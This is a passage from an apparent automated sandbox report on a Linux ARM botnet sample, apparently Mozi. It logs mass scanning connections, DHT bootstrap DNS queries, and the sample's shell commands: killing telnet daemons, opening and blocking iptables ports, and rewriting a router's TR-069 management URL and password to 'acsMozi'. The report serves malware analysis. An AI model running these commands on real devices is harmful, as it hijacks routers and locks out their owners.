                                                                                                                                May 1, 2021 20:24:33.078604937 CEST387228080192.168.2.20188.76.169.197
                                                                                                                                May 1, 2021 20:24:33.078619957 CEST517765555192.168.2.2054.214.12.70
                                                                                                                                May 1, 2021 20:24:33.078663111 CEST4031437215192.168.2.20222.36.210.127
                                                                                                                                May 1, 2021 20:24:33.078694105 CEST3373680192.168.2.20152.125.147.33
                                                                                                                                May 1, 2021 20:24:33.078722000 CEST5911449152192.168.2.20202.164.221.195
                                                                                                                                May 1, 2021 20:24:33.078744888 CEST5003649152192.168.2.20119.17.3.130
                                                                                                                                May 1, 2021 20:24:33.078773975 CEST5718652869192.168.2.20215.110.247.154
                                                                                                                                May 1, 2021 20:24:33.078795910 CEST579528443192.168.2.20118.183.105.53
                                                                                                                                May 1, 2021 20:24:33.078828096 CEST3323252869192.168.2.2027.46.25.163
                                                                                                                                May 1, 2021 20:24:33.078852892 CEST3687249152192.168.2.2062.237.39.27
                                                                                                                                May 1, 2021 20:24:33.078891993 CEST607765555192.168.2.20174.11.178.210
                                                                                                                                May 1, 2021 20:24:33.078933001 CEST389188080192.168.2.20164.156.119.109
                                                                                                                                May 1, 2021 20:24:33.078964949 CEST5474680192.168.2.2037.154.226.26
                                                                                                                                May 1, 2021 20:24:33.078998089 CEST567548080192.168.2.20185.95.199.80
                                                                                                                                May 1, 2021 20:24:33.079011917 CEST424848080192.168.2.2088.64.5.249
                                                                                                                                May 1, 2021 20:24:33.079051018 CEST598467574192.168.2.20202.171.192.205
                                                                                                                                May 1, 2021 20:24:33.079068899 CEST587608080192.168.2.20194.243.234.78
                                                                                                                                May 1, 2021 20:24:33.079101086 CEST5342480192.168.2.2066.145.187.93
                                                                                                                                May 1, 2021 20:24:33.079135895 CEST4524280192.168.2.20165.98.234.190
                                                                                                                                May 1, 2021 20:24:33.079147100 CEST469867574192.168.2.2076.5.175.91

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                May 1, 2021 20:24:53.493402958 CEST192.168.2.208.8.8.80x2Standard query (0)dht.transmissionbt.comA (IP address)IN (0x0001)
                                                                                                                                May 1, 2021 20:24:53.554577112 CEST192.168.2.208.8.8.80x3Standard query (0)router.bittorrent.comA (IP address)IN (0x0001)
                                                                                                                                May 1, 2021 20:24:53.605376005 CEST192.168.2.208.8.8.80x4Standard query (0)router.utorrent.comA (IP address)IN (0x0001)
                                                                                                                                May 1, 2021 20:24:53.657879114 CEST192.168.2.208.8.8.80x5Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                May 1, 2021 20:24:53.552928925 CEST8.8.8.8192.168.2.200x2No error (0)dht.transmissionbt.com87.98.162.88A (IP address)IN (0x0001)
                                                                                                                                May 1, 2021 20:24:53.552928925 CEST8.8.8.8192.168.2.200x2No error (0)dht.transmissionbt.com212.129.33.59A (IP address)IN (0x0001)
                                                                                                                                May 1, 2021 20:24:53.604682922 CEST8.8.8.8192.168.2.200x3No error (0)router.bittorrent.com67.215.246.10A (IP address)IN (0x0001)
                                                                                                                                May 1, 2021 20:24:53.657232046 CEST8.8.8.8192.168.2.200x4No error (0)router.utorrent.com82.221.103.244A (IP address)IN (0x0001)
                                                                                                                                May 1, 2021 20:24:53.719607115 CEST8.8.8.8192.168.2.200x5No error (0)bttracker.debian.orgbttracker.acc.umu.seCNAME (Canonical name)IN (0x0001)
                                                                                                                                May 1, 2021 20:24:53.719607115 CEST8.8.8.8192.168.2.200x5No error (0)bttracker.acc.umu.se130.239.18.159A (IP address)IN (0x0001)

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • 81.196.113.75:80
                                                                                                                                • 184.86.117.97:80
                                                                                                                                • 112.125.239.197:80
                                                                                                                                • 210.190.146.92:80
                                                                                                                                • 49.44.132.19:80
                                                                                                                                • 127.0.0.1:80
                                                                                                                                • 147.46.176.166:80
                                                                                                                                • 104.124.230.135:80
                                                                                                                                • 179.40.62.87:80
                                                                                                                                • 3.22.17.236:80
                                                                                                                                • 204.232.228.51:80
                                                                                                                                • 1.34.1.251:80
                                                                                                                                • 45.148.37.237:80
                                                                                                                                • 127.0.0.1:8080
                                                                                                                                • 46.249.83.253:80
                                                                                                                                • 123.110.194.55:80
                                                                                                                                • 114.204.63.176:49152
                                                                                                                                • 13.109.201.46:80
                                                                                                                                • 154.3.84.96:80
                                                                                                                                • 89.129.183.215:80
                                                                                                                                • 185.36.171.129:80
                                                                                                                                • 166.88.13.234:80
                                                                                                                                • 188.106.17.156:80

                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Start time:20:24:27
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:/usr/bin/qemu-arm /tmp/nT7K5GG5km
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:27
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:27
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:27
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:27
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:27
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:27
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/usr/bin/killall
                                                                                                                                Arguments:killall -9 telnetd utelnetd scfgmgr
                                                                                                                                File size:23736 bytes
                                                                                                                                MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

                                                                                                                                General

                                                                                                                                Start time:20:24:27
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:27
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:27
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:n/a
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/modprobe
                                                                                                                                Arguments:/sbin/modprobe ip_tables
                                                                                                                                File size:9 bytes
                                                                                                                                MD5 hash:3d0e6fb594a9ad9c854ace3e507f86c5

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 44040 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p tcp --dport 44040 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:32
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:37
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:42
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p tcp --dport 58000 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/nT7K5GG5km
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:20:24:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

